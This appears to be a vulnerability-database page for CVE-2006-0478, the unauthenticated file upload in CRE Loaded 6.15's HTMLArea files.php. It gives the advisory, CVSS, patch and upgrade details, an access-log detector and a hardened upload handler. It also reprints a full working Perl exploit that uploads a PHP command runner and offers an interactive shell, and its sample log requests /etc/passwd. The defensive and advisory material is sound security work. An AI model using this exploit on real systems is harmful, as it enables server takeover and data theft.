CVE-2006-0478
CVSS 7.5
Published: 2006-01-31 06:03:00
Revised: 2011-03-07 21:30:08

[Original] CRE Loaded 6.15 allows remote attackers to perform privileged actions, including uploading and creating arbitrary files, via a direct request to files.php. NOTE: the vendor states "The initial announcement of this risk was made on our website... and it included a patch which will close the vulnerability on all known 6.0x and 6.1x releases. We strongly encourage users of CRE Loaded 6.x, osCMax, and other users of osCommerce who have installed HTMLArea based WYSIWYG editors and Admin Access with Levels to modify their installations at the earliest possible moment."


[CNNVD] CRE Loaded files.php Access Validation Vulnerability (CNNVD-200601-376)

        CRE Loaded 6.15 contains an access validation flaw: a remote attacker can perform privileged actions, including uploading and creating arbitrary files, by sending a direct request to files.php. Note: the vendor states that the risk was first announced on its website, together with a patch that closes the vulnerability on all known 6.0x and 6.1x releases, and strongly encourages users of CRE Loaded 6.x, osCMax and other osCommerce installations that have added an HTMLArea-based WYSIWYG editor and Admin Access with Levels to modify their installations as soon as possible.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [reduced performance or interrupted access to resources]
Access complexity: LOW [no special conditions are needed to exploit]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [no authentication is required to exploit]

These metrics correspond to the CVSS v2 vector AV:N/AC:L/Au:N/C:P/I:P/A:P. Since the unauthenticated upload yields command execution as the web server user (see the exploit further down this page), treat the practical impact as higher than the three PARTIAL ratings suggest.

- CPE (affected platforms and products)

Product and version information (CPE) not available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0478
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0478
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-376
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/16415
(PATCH)  BID  16415
http://secunia.com/advisories/18648
(VENDOR_ADVISORY)  SECUNIA  18648
http://xforce.iss.net/xforce/xfdb/24377
(UNKNOWN)  XF  creloaded-files-auth-bypass(24377)
http://www.vupen.com/english/advisories/2006/0373
(UNKNOWN)  VUPEN  ADV-2006-0373
http://www.osvdb.org/22793
(UNKNOWN)  OSVDB  22793
http://www.attrition.org/pipermail/vim/2006-February/000527.html
(UNKNOWN)  VIM  20060203 vendor ack/fix: 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload (fwd)

- Vulnerability information

CRE Loaded files.php Access Validation Vulnerability
High risk / Access validation error
Published 2006-01-31 00:00:00; updated 2007-01-24 00:00:00
Remote
        CRE Loaded 6.15 contains an access validation flaw: a remote attacker can perform privileged actions, including uploading and creating arbitrary files, by sending a direct request to files.php. The vendor's statement about the original announcement and the 6.0x/6.1x patch is quoted in the description at the top of this page.

- Advisories and patches

        The vendor has released a fixed version for this issue. Affected releases and the release to upgrade to:
        Chain Reaction Edition CRE Loaded 6.0  -> Chain Reaction Edition CRE Loaded 6.2
        Chain Reaction Edition CRE Loaded 6.1  -> Chain Reaction Edition CRE Loaded 6.2
        Chain Reaction Edition CRE Loaded 6.15 -> Chain Reaction Edition CRE Loaded 6.2
        Download: http://creloaded.com/Downloads/d_op=getit/lid=172.html
        Installations that cannot upgrade should apply the vendor's patch for 6.0x/6.1x referred to in the description above.

- Exploit (EDB-ID 1446)

creLoaded <= 6.15 (HTMLAREA) Automated Perl Exploit (EDBID:1446)
Platform: php webapps
Published: 2006-01-24 (Verified)
Author: kaneda
#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda <kaneda@blacksecurity.org>
#
# Rather simple exploit, but still an exploit nonetheless.  Attempts to upload php script and
# utilise that to execute commands, and show off a fake shell.
#
# Can specify:
# 	* User-defined PHP script or one provided in this script (suits most occasions)
# 	* Additional variables to pass to PHP script after upload
# 	* HTTP proxy
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz
#

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;
use Term::ReadLine;
use File::Basename;
use URI::Escape;

print "creLoaded <= 6.15 HTMLAREA automated perl exploit\nhacked up by kaneda\n";

# The HTMLArea file-manager script that answers without an admin session (the bug).
my $baseurl = "/admin/htmlarea/popups/file/files.php";

# -s script, -p proxy, -a extra variables, -G send shell commands with GET instead of POST
our ($opt_s, $opt_p, $opt_a, $opt_G);
getopts('s:p:a:G');
usage() if @ARGV < 1;

my (%vars, $response, $masterurl, $browser, $cmd);
$masterurl = $ARGV[0];
$browser   = LWP::UserAgent->new;

if ($opt_s) {
	print "[*] User-defined script '$opt_s' will be used instead of 'default'\n";
}

if ($opt_p) {
	# LWP expects a proxy URL, so accept the bare hostname:port form from usage() too.
	$opt_p = "http://$opt_p" unless $opt_p =~ m{^https?://};
	$browser->proxy(['http', 'https'] => $opt_p);
	print "[*] HTTP/HTTPS proxy set to $opt_p\n";
}

if ($opt_a) {
	foreach my $tmpvar (split(",", $opt_a)) {
		my ($name, $value) = split("=", $tmpvar, 2);
		$vars{$name} = $value;
		print "[+] Adding variable '$name' with value '$value'\n";
	}
}

sub usage
{
	print "usage: creloaded615.pl [-s/path/to/file.php] [-phostname:port] [-avarname1=value1,...,varname2=value2] [-G] URL\n\n";
	print "-a - additional variables i.e. -aaction=create,cid=12\n";
	print "-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080\n";
	print "-s - specify path to user-defined script instead of using default\n";
	print "-G - send shell commands with GET instead of POST\n";
	print "URL - http://vuln/store\n\n";
	exit;
}

# Sends the current %vars to $masterurl (the uploaded PHP script) by GET or POST.
sub sendform
{
	if ($opt_G) {
		my $url = $masterurl . "?";
		foreach my $key (keys %vars) {
			$url .= "&$key=" . uri_escape($vars{$key});
		}
		$response = $browser->get($url);
	} else {
		$response = $browser->post($masterurl, \%vars);
	}
	warn "[-] Request failed: " . $response->status_line . "\n" unless $response->is_success;
}

if (!$opt_s) {
	# Lazy: write a one-line PHP command runner to /tmp and upload that.
	print "[*] Creating 'default' PHP script\n";
	open(my $fh, ">", "/tmp/default.php") or die "Cannot write /tmp/default.php: $!";
	print $fh "<?php system(\$a); ?>";
	close($fh);
	$opt_s = "/tmp/default.php";
}
die "Cannot read '$opt_s': $!\n" unless -r $opt_s;
# files.php stores the upload under its original file name, so that is what we fetch later.
my $scriptname = basename($opt_s);

if (!$vars{"dirPath"}) {
	print "[*] Setting upload path to $masterurl/images\n";
	$vars{"dirPath"} = "/../images/";
}

print "[*] Abusing creLOADED\n";
$browser->timeout(10);
# The bug in one request: files.php performs the 'upload' action with no admin session check.
my $req = POST($masterurl . $baseurl,
	Content_Type => 'form-data',
	Content      => [ actions => "upload", dirPath => $vars{"dirPath"}, upload => [ $opt_s ] ]);
$response = $browser->request($req);
print "[*] Upload request returned " . $response->status_line . "\n";
$browser->timeout(180);
my $term = Term::ReadLine->new('cre');

print "[*] Executing 'id' then spawning fake shell\n";
$masterurl = $masterurl . "/images/" . $scriptname;
$vars{"a"} = "id";
sendform();
print $response->content;
while (1) {
	my $prompt = "bash-2.05b\$ ";
	$cmd = $term->readline($prompt, "");
	last unless defined $cmd;   # EOF (Ctrl-D)

	if (($cmd eq "quit") || ($cmd eq "exit")) {
		exit;
	}

	$vars{"a"} = $cmd;
	sendform();
	print $response->content;
}

# milw0rm.com [2006-01-24]
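The exploit above leaves two traces in an ordinary web-server access log: a POST to the file-manager script, then requests for a .php file under the store's images directory from the same client. The following Python is an added example (not part of the EDB entry or of CRE Loaded) that scans Apache combined-format log lines for exactly that pattern. The log lines are constructed for the example; the files.php path is the one from the advisory, and the "libwww-perl" User-Agent is simply LWP's default, which the exploit does not change.

```python
import re
from typing import Dict, List, Optional

# Constructed sample lines in Apache "combined" format: an LWP client posting to
# files.php, then calling the dropped /images/default.php, plus two benign
# requests from another client. Not taken from any real incident.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jan/2006:10:14:02 +0000] "POST /store/admin/htmlarea/popups/file/files.php HTTP/1.1" 200 1432 "-" "libwww-perl/5.803"
203.0.113.7 - - [30/Jan/2006:10:14:03 +0000] "POST /store/images/default.php HTTP/1.1" 200 58 "-" "libwww-perl/5.803"
203.0.113.7 - - [30/Jan/2006:10:14:09 +0000] "GET /store/images/default.php?a=cat%20/etc/passwd HTTP/1.1" 200 1871 "-" "libwww-perl/5.803"
198.51.100.4 - - [30/Jan/2006:10:15:11 +0000] "GET /store/images/logo.gif HTTP/1.1" 200 2100 "http://shop.example/store/" "Mozilla/4.0"
198.51.100.4 - - [30/Jan/2006:10:15:12 +0000] "GET /store/admin/login.php HTTP/1.1" 200 3300 "-" "Mozilla/4.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Path of the unauthenticated file-manager script (from the advisory and the exploit).
FILES_PHP = "/admin/htmlarea/popups/file/files.php"
# A PHP file served from an images directory: where the exploit drops its shell.
PHP_IN_IMAGES = re.compile(r"/images/[^/?]+\.php$")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def detect(log_text: str) -> List[Dict[str, str]]:
    """Flag files.php access and PHP execution from an images directory.

    Access logs do not carry the POST body, so 'actions=upload' itself is not
    visible: any POST to files.php is reported, and a later request for a .php
    file under /images/ from the same client is escalated to
    'webshell_after_upload'. A .php request under /images/ with no preceding
    files.php POST is still reported, just with a weaker label.
    """
    findings: List[Dict[str, str]] = []
    posted_to_files_php = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["target"].partition("?")[0]
        if path.endswith(FILES_PHP):
            findings.append({"kind": "files_php_access", "ip": rec["ip"],
                             "method": rec["method"], "target": rec["target"]})
            if rec["method"] == "POST":
                posted_to_files_php.add(rec["ip"])
        elif PHP_IN_IMAGES.search(path):
            kind = ("webshell_after_upload" if rec["ip"] in posted_to_files_php
                    else "php_in_images_dir")
            findings.append({"kind": kind, "ip": rec["ip"],
                             "method": rec["method"], "target": rec["target"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['kind']:22} {f['ip']:15} {f['method']:4} {f['target']}")
```

Run it against a real log with `detect(open("access.log").read())`; on a patched installation a files.php request should be accompanied by an admin session and a redirect to the login page rather than a 200, so a 200 on an unauthenticated POST is the signal to chase. The images-directory rule also catches shells dropped by other upload bugs, which is why it is kept separate from the files.php rule.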
		

- Vulnerability information (OSVDB)

OSVDB 22793
HTMLArea files.php Unauthenticated Arbitrary File Upload
Location: Remote / Network Access; Attack type: Input Manipulation
Impact: Unknown (OSVDB classification; the description below reports arbitrary code execution)
Exploit: Public

- Vulnerability description

HTMLArea contains a flaw that may allow a malicious user to execute arbitrary commands. The '/admin/htmlarea/popups/file/files.php' script is accessible without authentication, allowing a remote attacker to use this script to upload malicious PHP files and execute arbitrary code on the system.

- Timeline

2006-01-30 (other timeline dates unknown)

- Solution

Upgrade to CRE Loaded version 6.2 or higher, which has been reported to fix this vulnerability. In addition, Chain Reaction Works, Inc. has released a patch for some older versions (6.0x and 6.1x). Until either is applied, a reasonable workaround is to deny web access to the admin/htmlarea/popups/file/ directory at the web server, since files.php is only useful to a logged-in administrator.
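The vendor patch itself is not reproduced on this page, so the following Python is an added example (not CRE Loaded's or HTMLArea's code) that models the file manager's 'upload' action twice: once as the advisory describes it, honouring the request for any caller and trusting dirPath and the file name, and once with the checks a fixed handler needs. The directory layout (uploads written below <store>/images, so the exploit's dirPath of "/../images/" lands the file at <store>/images/default.php) and the image-extension allow-list are assumptions for the example; the request parameters are the ones the exploit sends.

```python
import posixpath
from dataclasses import dataclass
from typing import Dict

# Assumed layout for this example (not taken from CRE Loaded): the file manager
# writes uploads below the store's images directory.
STORE_ROOT = "/var/www/store"
IMAGES_ROOT = posixpath.join(STORE_ROOT, "images")
ALLOWED_EXT = {".gif", ".jpg", ".jpeg", ".png"}   # assumed allow-list


@dataclass
class Session:
    admin_logged_in: bool = False


def vulnerable_upload(params: Dict[str, str], filename: str, session: Session) -> str:
    """Models the unpatched handler: the 'upload' action is honoured for any
    caller (the session is never consulted), and dirPath plus the client-supplied
    file name are joined onto the upload root unchecked. Returns the path the
    file would be written to."""
    if params.get("actions") != "upload":
        return "ignored"
    dest_dir = IMAGES_ROOT + params.get("dirPath", "/")
    return posixpath.normpath(posixpath.join(dest_dir, filename))


def hardened_upload(params: Dict[str, str], filename: str, session: Session) -> str:
    """The same action with the three checks the vulnerable handler lacks."""
    # 1. Authentication first: no admin session, no file-manager actions at all.
    if not session.admin_logged_in:
        return "denied: admin login required"
    if params.get("actions") != "upload":
        return "ignored"
    # 2. Confine dirPath to the upload root: resolve it, then require that the
    #    result is still inside IMAGES_ROOT (a plain prefix test would be fooled
    #    by a sibling such as /var/www/store/images_backup).
    requested = params.get("dirPath", "/").lstrip("/")
    dest_dir = posixpath.normpath(posixpath.join(IMAGES_ROOT, requested))
    if posixpath.commonpath([IMAGES_ROOT, dest_dir]) != IMAGES_ROOT:
        return "denied: dirPath escapes upload root"
    # 3. Keep only the base name of the client-supplied file name and accept
    #    image extensions only, so an uploaded .php can never be executed.
    name = posixpath.basename(filename)
    ext = posixpath.splitext(name)[1].lower()
    if not name or ext not in ALLOWED_EXT:
        return "denied: file type not allowed"
    return posixpath.join(dest_dir, name)


if __name__ == "__main__":
    # The exact request the exploit sends, from an anonymous client.
    exploit = {"actions": "upload", "dirPath": "/../images/"}
    print("vulnerable:", vulnerable_upload(exploit, "default.php", Session()))
    print("hardened:  ", hardened_upload(exploit, "default.php", Session()))
```

The order of the checks matters: the authentication gate comes before any parameter handling, so an anonymous request never reaches the path logic, and the path check normalises before comparing so that a traversal such as "/../admin/" is rejected even for a logged-in administrator, who should not be able to write outside the upload root either.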

- References

(none listed)

- Credit

(none listed)

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP.

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are hosted on MITRE's websites.